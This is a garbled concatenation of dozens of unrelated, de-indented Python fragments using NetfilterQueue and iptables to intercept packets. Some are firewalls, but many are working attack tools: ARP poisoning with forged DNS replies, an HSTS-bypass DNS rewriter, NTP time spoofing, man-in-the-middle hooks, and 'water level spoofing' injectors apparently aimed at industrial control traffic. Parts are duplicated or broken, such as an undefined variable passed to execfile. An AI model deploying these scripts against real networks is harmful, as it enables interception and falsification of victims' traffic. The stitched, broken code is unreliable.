class InvalidPacketsFilter(object):
def __init__(self):
self._nfqueue = NetfilterQueue()
def filterPackets(self, packet):
#scapy_packet = IP(packet.get_payload())
#print " -------- INIZIO PACCHETTO --------\n\n\n"
#print scapy_packet.show()
#print "\n\n\n -------- FINE PACCHETTO --------\n\n\n"
packet.accept()
def monitoredTermination(self, signal_number, interrupted_frame):
self._nfqueue.unbind()
#system("su daniele -c \"notify-send \\\"Invalid packets filter status changed\\\" \\\"Stopped\\\"\"")
exit(0)
def start(self):
self._nfqueue.bind(2, self.filterPackets)
#system("su daniele -c \"notify-send \\\"Invalid packets filter status changed\\\" \\\"Started\\\"\"")
signal(SIGTERM, self.monitoredTermination)
self._nfqueue.run()
def stop(self):
self._nfqueue.unbind()
#system("su daniele -c \"notify-send \\\"Invalid packets filter status changed\\\" \\\"Stopped\\\"\"")
exit(0)
def do_mitm(self):
"""
Performs the man-in-the-middle attack. This function is blocking.
"""
try:
# Add necessary IP table entries.
self.log("Updating IP tables...")
system("iptables -A INPUT -d {} -p tcp -j NFQUEUE --queue-num {}".
format(self.ip, self.queue_number))
system("iptables -A OUTPUT -s {} -p tcp -j NFQUEUE --queue-num {}".
format(self.ip, self.queue_number))
# Bind to filter queue.
nfqueue = NetfilterQueue()
nfqueue.bind(self.queue_number, self.packet_callback)
s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX,
socket.SOCK_STREAM)
try:
self.log("Running MITM...")
nfqueue.run_socket(s)
except KeyboardInterrupt:
pass
self.log("Closing sockets...")
s.close()
nfqueue.unbind()
finally:
# Remove IP table entries.
self.log("Restoring IP tables.")
system("iptables -D INPUT 1")
system("iptables -D OUTPUT 1")
def main(argv):
spoofer = NTPSpoof()
spoofer.getCommandlineOpts(argv)
print "[===>] Using %s interface" % spoofer.interface
# trying to resolve gateway mac
spoofer.gateway_mac = spoofer.getMac(spoofer.gateway_ip)
if spoofer.gateway_mac is None:
print "[ERROR] Couldn't receive gateway MAC."
sys.exit()
else:
print "[===>] Gatway: IP=%s | MAC=%s " % (spoofer.gateway_ip,
spoofer.gateway_mac)
# trying to resolve target mac
spoofer.target_mac = spoofer.getMac(spoofer.target_ip)
if spoofer.target_mac is None:
print "[ERROR] Couldn't receive target MAC."
sys.exit()
else:
print "[===>] Target: IP=%s | MAC=%s " % (spoofer.target_ip,
spoofer.target_mac)
# start poisoning in different thread
poison_thread = threading.Thread(target = spoofer.poisonTarget)
poison_thread.start()
# put incoming ntp-replies into a queue for manipulation
print "[===>] Setting iptables for queuing"
os.system('iptables -A FORWARD -j NFQUEUE --queue-num 1')
# create netfilterqueue interface and bind to nfqueue #1
nfqueue = NetfilterQueue()
nfqueue.bind(1,spoofer.callback)
try:
# run queue
nfqueue.run()
except KeyboardInterrupt:
# unbind nfqueue and reset iptables
print "[===>] Resetting iptables"
nfqueue.unbind()
os.system('iptables -F')
finally:
# stop poisoning and wait for thread
POISON = False
time.sleep(2)
# restore after poisoning
print "[===>] Restoring targets ARP-Cache"
spoofer.restoreTarget()
sys.exit()
def main():
global quitting
setup(NUM_SLOTS)
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
timeout_thread = threading.Thread(target=timeout_thread_runner)
timeout_thread.daemon = True
timeout_thread.start()
honeypot_thread = threading.Thread(target=honeypot_thread_runner)
honeypot_thread.daemon = True
honeypot_thread.start()
nfqueue = NetfilterQueue()
nfqueue.bind(1, on_packet_received)
s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM)
try:
nfqueue.run_socket(s)
except KeyboardInterrupt:
print('')
quitting = True
s.close()
nfqueue.unbind()
def main(argv):
if len(argv) < 3:
print('netfilter.py queuenum host port')
exit(s)
qnum = int(argv[0])
host = argv[1]
port = int(argv[2])
try:
print host
print port
s.settimeout(40)
s.connect((host, port))
print('NAT Server found')
except Exception as e:
print("No NAT found")
exit(s)
nfqueue = NetfilterQueue()
nfqueue.bind(qnum, handle_packet)
FORMAT = '%(asctime)-15s %(message)s'
logging.basicConfig(filename='filtertimes.log', level=logging.DEBUG, format=FORMAT)
logging.info("NEW TRIAL")
try:
print 'RUNNING QUEUE'
nfqueue.run()
except KeyboardInterrupt:
print 'Stopped'
nfqueue.unbind()
exit(s)
def run():
if importerror == True:
printError("Netfilterqueue is not imported!")
print("Traceback:\n" + str(error))
return
controller.reset()
printInfo("Loading host list...")
try:
hostfile = open(getpath.conf() + "hosts", "r").read()
except FileNotFoundError:
printError("Host list is not found!")
return
except PermissionError:
printError("Permission denied!")
for line in hostfile.splitlines():
if "#" not in line and len(line.split()) == 2:
hostlist.append(line.split())
for item in hostlist:
try:
item[0] = item[0].encode()
except AttributeError:
pass
try:
item[1] = item[1].encode()
except AttributeError:
pass
if variables["arp_spoof"][0] == "true":
printInfo("IPv4 forwarding...")
os.system('echo "1" >> /proc/sys/net/ipv4/ip_forward')
printInfo("Starting ARP spoof...")
arpspoof = ArpSpoofer(variables["router"][0], variables["target"][0],
controller)
arpspoof.start()
printInform("Ctrl-C to stop.")
os.system(
'iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1'
)
try:
q = NetfilterQueue()
q.bind(1, callback)
try:
q.run()
except KeyboardInterrupt:
controller.kill = True
q.unbind()
os.system('iptables -F')
os.system('iptables -X')
printInform("DNS spoof stopped.")
except:
printError("Unexcepted error:\n")
traceback.print_exc(file=sys.stdout)
controller.kill = True
if variables["arp_spoof"][0] == "true":
printInfo("Stopping ARP spoof...")
arpspoof.join()
class PacketFilter:
def __init__(self, filter):
self.filter = filter
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(0, self.modify)
self.nfqueue.run()
def modify(self, pkt):
#log.debug("Got packet")
data = pkt.get_payload()
packet = IP(data)
for filter in self.filter:
try:
execfile(i)
except Exception:
log.debug("Error occurred in filter", filter)
print_exc()
pkt.set_payload(str(packet)) #set the packet content to our modified version
pkt.accept() #accept the packet
def stop(self):
self.nfqueue.unbind()
set_ip_forwarding(0)
iptables().flush()
def startIntercept():
rules()
nfqueue = NetfilterQueue()
# Bind it to queue number 2
nfqueue.bind(2, handle_packet)
s = socket.fromfd(nfqueue.get_fd(), socket.AF_INET, socket.SOCK_STREAM)
try:
# Start nfqueue
nfqueue.run_socket(s)
except KeyboardInterrupt:
flush_tables()
nfqueue.unbind()
destroyTap()
gc.TCPDUMP.terminate()
gc.LOG_DEBUG.debug("Exiting Program (Keyboard Interrupt)")
gc.LOG_DEBUG.debug('#' * 50)
sys.exit()
except SystemError:
gc.LOG_DEBUG.debug("Failed to Start NFQueue (System Error)")
flush_tables()
nfqueue.unbind()
destroyTap()
sys.exit()
except:
gc.LOG_DEBUG.debug(
"Failed to Start NFQueue (Unknown Error Encountered)")
sys.exit()
class PacketFilter:
def __init__(self, filter):
self.filter = filter
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(0, self.modify)
self.nfqueue.run()
def modify(self, pkt):
#log.debug("Got packet")
data = pkt.get_payload()
packet = IP(data)
for filter in self.filter:
try:
execfile(i)
except Exception:
log.debug("Error occurred in filter", filter)
print_exc()
pkt.set_payload(
str(packet)) #set the packet content to our modified version
pkt.accept() #accept the packet
def stop(self):
self.nfqueue.unbind()
set_ip_forwarding(0)
iptables().flush()
def main(queue_num):
open("database.json", 'a', os.O_NONBLOCK)
open("log.txt", 'a', os.O_NONBLOCK)
if os.stat("database.json").st_size == 0:
open("database.json", "w").write("{}")
global database_filename, total_packets, packet_accepted
database_filename = "database.json"
total_packets = 0
packet_accepted = 0
#making queue and assigning callback
nfqueue = NetfilterQueue(max_len=10000)
nfqueue.bind(queue_num, cb)
print("Started Firewall .... ")
#calling on each packet arrival
try:
nfqueue.run()
except KeyboardInterrupt:
print
("Keyboard Interrupt")
#ending of program
nfqueue.unbind()
print("Queue Closed\n")
print(
"STATISTICS\n\tTotal Packets :: {}\n\tPackets Accepted :: {}\n\tPackets Dropped :: {}"
.format(total_packets, packet_accepted,
total_packets - packet_accepted))
def start_server_com():
server = NetfilterQueue()
server.bind(1, server_stream)
try:
server.run()
except KeyboardInterrupt:
server.unbind()
class PacketFilter:
def __init__(self, filter):
self.filter = filter
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(1, self.modify)
t = threading.Thread(name='packetparser', target=self.nfqueue.run)
t.setDaemon(True)
t.start()
def modify(self, pkt):
#log.debug("Got packet")
data = pkt.get_payload()
packet = IP(data)
try:
execfile(self.filter)
except Exception:
log.debug("Error occurred in filter")
print_exc()
pkt.set_payload(
str(packet)) #set the packet content to our modified version
pkt.accept() #accept the packet
def stop(self):
self.nfqueue.unbind()
set_ip_forwarding(0)
iptables().flush()
class PacketFilter:
def __init__(self, filter):
self.filter = filter
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(1, self.modify)
t = threading.Thread(name='packetparser', target=self.nfqueue.run)
t.setDaemon(True)
t.start()
def modify(self, pkt):
#log.debug("Got packet")
data = pkt.get_payload()
packet = IP(data)
try:
execfile(self.filter)
except Exception:
log.debug("Error occurred in filter")
print_exc()
pkt.set_payload(str(packet)) #set the packet content to our modified version
pkt.accept() #accept the packet
def stop(self):
self.nfqueue.unbind()
set_ip_forwarding(0)
iptables().flush()
def run(self):
self.args()
self.log('Starting')
######### MAIN CODE ###########
# Iptables rule for NTP packets
os.system(
'iptables -t raw -A PREROUTING -p udp --sport 123 -j NFQUEUE --queue-num 20'
)
# Filter packets
nfqueue = NetfilterQueue()
#20 is the iptables rule queue number
nfqueue.bind(20, self.manipulate)
try:
self.log("[!] Waiting for NTP packages to spoof (Year = " +
str(self.year) + " )")
nfqueue.run()
except Exception as e:
self.log("[!] [FAIL] Failed to start NetFilterQueue : " + e)
sys.exit(1)
finally:
nfqueue.unbind()
#p.terminate()
os.system('iptables -F -vt raw')
###############################
self.finish(True)
def main():
try:
iptables_cmd = 'iptables -t raw -A PREROUTING -p tcp --dport ' + args.port + ' -j NFQUEUE --queue-num 1'
cmd = os.system(iptables_cmd)
print("[+] Setting IpTables rules")
if cmd != 0:
print("[-] setting iptables failed, exiting!")
quit()
#create NetfilterQueue object
nfqueue = NetfilterQueue()
nfqueue.bind(1, callback)
print("[+] Waiting for data...")
print("[+] Accepting only from", args.source, "port", args.port)
nfqueue.run()
except KeyboardInterrupt:
print("[+] Restoring iptables")
#restore iptables
os.system("iptables -F -t raw")
print('[+] Exiting')
nfqueue.unbind()
def initialize(self, result):
if platform.system() == "Darwin":
pass
else:
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1')
global domain
global localIP
localIP = self.config["poisoned_ip"]
domain = self.config["domain"]
self.running = True
if platform.system() == "Darwin":
thread = threading.Thread(target=self.dns_sniffer)
thread.start()
thread.join()
else:
global queue
from netfilterqueue import NetfilterQueue
queue = NetfilterQueue()
queue.bind(1, self.callback)
try:
queue.run() # Main loop
except KeyboardInterrupt:
queue.unbind()
# os.system('iptables -F')
# os.system('iptables -X')
return
def main(argv) :
global logger
filename = os.path.join( BASEDIR, TARGET_FILE )
load_blacklist(filename)
print( '#### START ####' )
sys.stdout.flush()
setup()
logger = Logger("/var/log/pfloyd.log", False)
event_handler = ChangeHandler()
observer = Observer()
observer.schedule(event_handler,BASEDIR,recursive=True)
observer.start()
nfqueue = NetfilterQueue()
nfqueue.bind(1, netblocker)
try:
nfqueue.run()
except KeyboardInterrupt:
observer.stop()
print('')
nfqueue.unbind()
observer.join()
class DNSspoof(object):
name = "DNS spoofing"
desc = "Filter DNS packets while in man-in-the-middle and modify packet."
version = "0.3"
def __init__(self,fake):
self.fake = fake
def callback(self, packet):
payload = packet.get_payload()
pkt = IP(payload)
if not pkt.haslayer(DNSQR):
packet.accept()
else:
if self.inject != None:
new_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=self.fake))
packet.set_payload(str(new_pkt))
packet.accept()
elif self.domain in pkt[DNS].qd.qname:
new_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=self.fake))
packet.set_payload(str(new_pkt))
packet.accept()
else:
packet.accept()
self.currentdomain = str(pkt[DNS].qd.qname)
def spoof(self):
try:
self.q = NetfilterQueue()
self.q.bind(1, self.callback)
self.q.run()
except Exception as e:
print "[*] Exception caught: {}".format(e)
def stop(self):
self.q.unbind()
os.system('iptables -t nat -D PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1')
def getdomain(self):
return self.currentdomain
def start(self,domain,inject):
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1')
self.domain = domain
self.inject = inject
t = threading.Thread(name='DNSspoof', target=self.spoof)
t.setDaemon(True)
t.start()
def start_netfilter(self):
packets_queue = NetfilterQueue()
packets_queue.bind(1, self.packet_callback)
try:
packets_queue.run()
except KeyboardInterrupt:
print('')
packets_queue.unbind()
def main():
nfqueue = NetfilterQueue()
nfqueue.bind(int(sys.argv[1]), process)
try:
nfqueue.run()
except KeyboardInterrupt:
print('')
nfqueue.unbind()
def main():
nfqueue = NetfilterQueue()
nfqueue.bind(1, dns_nat_arbiter)
try:
nfqueue.run()
except KeyboardInterrupt:
print('')
nfqueue.unbind()
def run():
if importerror == True:
printError("netfilterqueue isn't imported")
printInfo("install the dependencies and reload this module")
print("traceback:\n"+str(error))
return
controller.reset()
printInfo("loading host list...")
try:
hostfile = open(getpath.conf()+"hosts", "r").read()
except FileNotFoundError:
printError("host list not found")
return
except PermissionError:
printError("permission denied")
for line in hostfile.splitlines():
if "#" not in line and len(line.split()) == 2:
hostlist.append(line.split())
for item in hostlist:
try:
item[0] = item[0].encode()
except AttributeError:
pass
try:
item[1] = item[1].encode()
except AttributeError:
pass
if variables["arp_spoof"][0] == "true":
printInfo("ipv4 forwarding...")
os.system('echo "1" >> /proc/sys/net/ipv4/ip_forward')
printInfo("starting arp spoof...")
arpspoof = ArpSpoofer(variables["router"][0], variables["target"][0], controller)
arpspoof.start()
printInfo("ctrl + c to end")
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1')
try:
q = NetfilterQueue()
q.bind(1, callback)
try:
q.run()
except KeyboardInterrupt:
controller.kill = True
q.unbind()
os.system('iptables -F')
os.system('iptables -X')
printInfo("dns spoof ended")
except:
printError("unexcepted error:\n")
traceback.print_exc(file=sys.stdout)
controller.kill = True
if variables["arp_spoof"][0] == "true":
printInfo("stopping arp spoof")
arpspoof.join()
def main(argv):
spoofer = NTPSpoof()
spoofer.getCommandlineOpts(argv)
print "[===>] Using %s interface" % spoofer.interface
# trying to resolve gateway mac
spoofer.gateway_mac = spoofer.getMac(spoofer.gateway_ip)
if spoofer.gateway_mac is None:
print "[ERROR] Couldn't receive gateway MAC."
sys.exit()
else:
print "[===>] Gatway: IP=%s | MAC=%s " % (spoofer.gateway_ip,
spoofer.gateway_mac)
# trying to resolve target mac
spoofer.target_mac = spoofer.getMac(spoofer.target_ip)
if spoofer.target_mac is None:
print "[ERROR] Couldn't receive target MAC."
sys.exit()
else:
print "[===>] Target: IP=%s | MAC=%s " % (spoofer.target_ip,
spoofer.target_mac)
# start poisoning in different thread
poison_thread = threading.Thread(target=spoofer.poisonTarget)
poison_thread.start()
# put incoming ntp-replies into a queue for manipulation
print "[===>] Setting iptables for queuing"
os.system('iptables -A FORWARD -j NFQUEUE --queue-num 1')
# create netfilterqueue interface and bind to nfqueue #1
nfqueue = NetfilterQueue()
nfqueue.bind(1, spoofer.callback)
try:
# run queue
nfqueue.run()
except KeyboardInterrupt:
# unbind nfqueue and reset iptables
print "[===>] Resetting iptables"
nfqueue.unbind()
os.system('iptables -F')
finally:
# stop poisoning and wait for thread
POISON = False
time.sleep(2)
# restore after poisoning
print "[===>] Restoring targets ARP-Cache"
spoofer.restoreTarget()
sys.exit()
def intercepter(stop):
if not stop():
print "[*] Starting intercepter..."
Queue_num = 0
queue = NetfilterQueue()
queue.bind(Queue_num, modify_dns)
queue.run()
else:
queue.unbind()
def run(self):
nfqueue = NetfilterQueue()
nfqueue.bind(0, self.packet_decider)
try:
nfqueue.run()
except KeyboardInterrupt:
logging.info("[FW][Info] Finishing nfqueue")
nfqueue.unbind()
self.close()
def run(self):
os.system("iptables-restore < /etc/iptables/intall")
nfqueue = NetfilterQueue()
nfqueue.bind(1, self.callback)
try:
nfqueue.run()
except KeyboardInterrupt:
nfqueue.unbind()
os.system("iptables-restore < /etc/iptables/clean")
def main():
q = NetfilterQueue()
q.bind(1, callback)
try:
q.run() # Main loop
except KeyboardInterrupt:
q.unbind()
os.system('iptables -F')
os.system('iptables -X')
def FWsubprocess():
'''
Almost dummy subprocess for the firewall binding
'''
try:
nfqueue = NetfilterQueue()
nfqueue.bind(0, print_and_accept)
nfqueue.run()
except KeyboardInterrupt:
nfqueue.unbind()
def main():
parse_arg_and_patterns()
nfqueue = NetfilterQueue()
nfqueue.bind(1, pkt_check)
try:
nfqueue.run()
except KeyboardInterrupt:
print
finally:
nfqueue.unbind()
def main():
nfqueue = NetfilterQueue()
nfqueue.bind(0, callback)
try:
nfqueue.run()
except KeyboardInterrupt:
nfqueue.unbind()
os.system('iptables -F')
os.system('iptables -X')
sys.exit('losing...')
def launch_nfqueue(num):
nfqueue = NetfilterQueue()
nfqueue.bind(num, callback)
sleep(1)
while lock([])[0] is False:
print '#'*10 + '-'*10 + '> Bound to queue %s <'%num + '-'*10 +'#'*10
nfqueue.run()
print '#'*10 + '-'*10 + '> Queue %s had to restart <'%num + '-'*10 + '#'*10
print '#'*10 + '-'*10 + '> Queue %s got SIGSTOP <'%num + '-'*10 + '#'*10
nfqueue.unbind()
def main():
queue = NFQ()
try:
os.system("iptables -I FORWARD -j NFQUEUE --queue-num 10")
# bind trebuie să folosească aceiași coadă ca cea definită în iptables
queue.bind(10, detect_and_alter_packet)
queue.run()
except KeyboardInterrupt:
os.system("iptables --flush")
queue.unbind()
def main():
nfqueue = NetfilterQueue()
nfqueue.bind(1, print_and_accept)
s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM)
try:
nfqueue.run_socket(s)
except:
print('')
s.close()
nfqueue.unbind()
def main():
print "starting script...."
initial_configure()
nfqueue = NetfilterQueue()
nfqueue.bind(1, test_packet_process)
try:
nfqueue.run()
except KeyboardInterrupt:
print('')
nfqueue.unbind()
def start():
__setup()
nfqueue = NetfilterQueue()
nfqueue.bind(0, __inject)
try:
print("[*] starting water flow spoofing")
nfqueue.run()
except KeyboardInterrupt:
__setdown()
print("[*] stopping water flow spoofing")
nfqueue.unbind()
def main():
q = NetfilterQueue()
q.bind(1, callback)
s = socket.fromfd(q.get_fd(), socket.AF_INET, socket.SOCK_STREAM)
try:
q.run_socket(s)
except KeyboardInterrupt:
q.unbind()
print("flushing tables")
os.system('iptables -F')
os.system('iptables -X')
def start(self):
sys.stdout.write('Listening on NFQUEUE %s... \n' % str(QUEUE_NUM))
nfqueue = NetfilterQueue()
nfqueue.bind(QUEUE_NUM, self._packet_callback)
s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM)
try:
nfqueue.run_socket(s)
except KeyboardInterrupt:
sys.stdout.write('Exiting \n')
s.close()
nfqueue.unbind()
def subproc_clb(queue_num):
nfqueue = NetfilterQueue()
try:
nfqueue.bind(queue_num, nfqueue_clb)
nfqueue.run()
except KeyboardInterrupt:
print('Terminating Queue ' + str(queue_num))
finally:
nfqueue.unbind()
pass
pass
def run(self):
# This is the intercept
q = NetfilterQueue()
q.bind(1, self.callback)
t = threading.Thread(target=self.__run_threaded, args=(q,))
t.daemon = True
t.start()
while not self.event.is_set():
self.configurator()
print("DNSspoofer finishing!")
q.unbind()
def main():
q = NetfilterQueue()
q.bind(1,process)
try:
print "Binding"
#q.try_run()
q.run()
except KeyboardInterrupt:
print "Exiting..."
q.unbind()
sys.exit(1)
def packet_filter():
nfq = NetfilterQueue()
nfq.bind(1, pkt_filter_callback)
try:
print 'Controller packet filtering mode'
nfq.run()
except KeyboardInterrupt:
print 'Quitting packet filter'
nfq.unbind()
raise KeyboardInterrupt
def start():
__setup()
nfqueue = NetfilterQueue()
nfqueue.bind(0, __inject)
try:
print("[*] starting water level spoofing")
nfqueue.run()
except KeyboardInterrupt:
__setdown()
thread.stop()
thread.join()
nfqueue.unbind()
print("[*] stopping water level spoofing")
return 0
def start():
__setup()
nfqueue = NetfilterQueue()
nfqueue.bind(0, __inject)
try:
print(datetime.datetime.now())
print("[*] starting multipoint attack")
nfqueue.run()
except KeyboardInterrupt:
__setdown()
print("[*] stopping multipoint attack")
print(datetime.datetime.now())
nfqueue.unbind()
return 1
class NFQueue(multiprocessing.Process):
_nfqueue = None
_queues = []
def __init__(self, queues):
multiprocessing.Process.__init__(self)
self._queues = queues
self._nfqueue = NetfilterQueue()
def handle_pkt(self, queue, pkt):
logger.debug('Queue %s pkt len %s content %s' %
(queue, pkt.get_payload_len(), pkt))
print('Queue %s pkt len %s content %s' %
(queue, pkt.get_payload_len(), pkt))
o_pkt = IP(pkt.get_payload())
m = MPLS(label=0x9, cos = 0x3)
#new_pkt = Ether(type=0x8847)/m/o_pkt
new_pkt = Ether()/o_pkt
#new_pkt = o_pkt/Raw('FFFFFF'+ pkt.get_payload())
send(new_pkt)
new_pkt.show()
pkt.drop()
# pkt.accept()
def run(self):
for i in self._queues:
self._nfqueue.bind(i, curry(self.handle_pkt, i))
logger.info("Bind queue %s" % i)
try:
self._nfqueue.run()
except ValueError:
logger.debug("STOPPPED due to invalid configuration ")
self.cleanup()
except KeyboardInterrupt:
logger.debug("STOPPPED due to user keyboard input ")
self.cleanup()
except:
logger.debug("STOPPPED due to user keyboard input ")
self.cleanup()
def cleanup(self):
logger.debug("packet handler cleaning up ")
self._nfqueue.unbind()
def stop(self):
logger.debug("packet handler stopped ")
self.cleanup()
def start():
__setup()
nfqueue = NetfilterQueue()
nfqueue.bind(0, __inject)
thread = RepeatEvery(1, update_attack_level)
try:
print("[*] starting water level spoofing")
thread.start()
nfqueue.run()
except KeyboardInterrupt:
__setdown()
thread.stop()
thread.join()
nfqueue.unbind()
print("[*] stopping water level spoofing")
def selective_forward_func():
selective_filter_path = os.path.join(os.getcwd(), 'connect_module', 'AP_module', SELECTIVE_FILTER_PATH_NAME)
proto_setting_fp = open(os.path.join(selective_filter_path, 'setting_protocol.csv'))
addr_setting_fp = open(os.path.join(selective_filter_path, 'setting_address.csv'))
proto_lines = proto_setting_fp.readlines()
addr_lines = addr_setting_fp.readlines()
for line in proto_lines:
proto, action = line.replace('\n', '').split(',')
proto_filter[int(proto)] = action
for line in addr_lines:
target, addr, port, action = line.replace('\n', '').split(',')
try:
if target == 'src':
src_addr_filter[addr] = (int(port), action)
elif target == 'dst':
dst_addr_filter[addr] = (int(port), action)
except ValueError:
if target == 'src':
src_addr_filter[addr] = (port, action)
elif target == 'dst':
dst_addr_filter[addr] = (port, action)
'''
q = nfqueue.queue()
q.open()
q.bind(socket.AF_INET)
q.set_callback(pkt_modify)
q.create_queue(1)
'''
nfq = NetfilterQueue()
nfq.bind(1, pkt_filter_callback)
try:
print 'Starting to filtering packets'
nfq.run()
except KeyboardInterrupt:
print 'Quitting selective mode'
nfq.unbind()
class DNSspoof(object):
def __init__(self,domain,fake):
self.domain = domain
self.fake = fake
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1')
def callback(self, packet):
payload = packet.get_payload()
pkt = IP(payload)
if not pkt.haslayer(DNSQR):
packet.accept()
else:
if self.domain in pkt[DNS].qd.qname:
new_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=self.fake))
packet.set_payload(str(new_pkt))
packet.accept()
else:
packet.accept()
def start(self):
try:
self.q = NetfilterQueue()
self.q.bind(1, self.callback)
self.q.run()
except Exception as e:
print "[*] Exception caught: {}".format(e)
def stop(self):
self.q.unbind()
os.system('iptables -t nat -D PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1')
sys.exit(0)
def main(self):
t = threading.Thread(name='DNSspoof', target=self.start)
t.setDaemon(True)
t.start()
def main():
# Root check
if(os.getuid() != 0):
exit("This program must be run with root/sudo")
# Initialize new process for ARP poisoning
arp_poison = Process(target=ArpPoison, args=(args.ip, args.router, args.iface))
arp_poison.start()
# Create iptables rule to forward prerouting to NFQUEUE
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1')
# Initialize nfqueue and bind to parse function
nfqueue = NetfilterQueue()
nfqueue.bind(1, parse)
# Main loop
try:
nfqueue.run()
except KeyboardInterrupt:
print("Interrupt Signal received, shutting down...")
nfqueue.unbind()
arp_poison.join()
os.system('iptables -t nat -F')
class _DNS():
def __init__(self, queue_number):
self.hsts = False
self.dns = False
self.dnscfg = None
self.hstscfg = None
self.queue_number = queue_number
self.nfqueue = NetfilterQueue()
def start(self):
t = threading.Thread(name='dns_nfqueue', target=self.nfqueue_bind, args=())
t.setDaemon(True)
t.start()
def nfqueue_bind(self):
self.nfqueue.bind(self.queue_number, self.nfqueue_callback)
self.nfqueue.run()
def stop(self):
try:
self.nfqueue.unbind()
except:
pass
def resolve_domain(self, domain):
try:
logging.debug("Resolving -> %s" % domain)
answer = dns.resolver.query(domain, 'A')
real_ips = []
for rdata in answer:
real_ips.append(rdata.address)
if len(real_ips) > 0:
return real_ips
except Exception:
logging.info("Error resolving " + domain)
def nfqueue_callback(self, payload):
try:
#logging.debug(payload)
pkt = IP(payload.get_payload())
if not pkt.haslayer(DNSQR):
payload.accept()
if pkt.haslayer(DNSQR):
logging.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype))
if self.dns:
for k, v in self.dnscfg.items():
if k in pkt[DNSQR].qname:
self.modify_dns(payload, pkt, v)
return
payload.accept()
elif self.hsts:
if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1):
for k,v in self.hstscfg.items():
if v == pkt[DNSQR].qname[:-1]:
ip = self.resolve_domain(k)
if ip:
self.modify_dns(payload, pkt, ip)
return
if 'wwww' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
if ip:
self.modify_dns(payload, pkt, ip)
return
if 'web' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[3:-1])
if ip:
self.modify_dns(payload, pkt, ip)
return
payload.accept()
except Exception, e:
print "Exception occurred in nfqueue callback: " + str(e)
#!/usr/bin/env python
from netfilterqueue import NetfilterQueue
def print_and_accept(pkt):
print(pkt)
pkt.accept()
nfqueue = NetfilterQueue()
nfqueue.bind(1, print_and_accept)
try:
nfqueue.run()
except KeyboardInterrupt:
print('')
nfqueue.unbind()
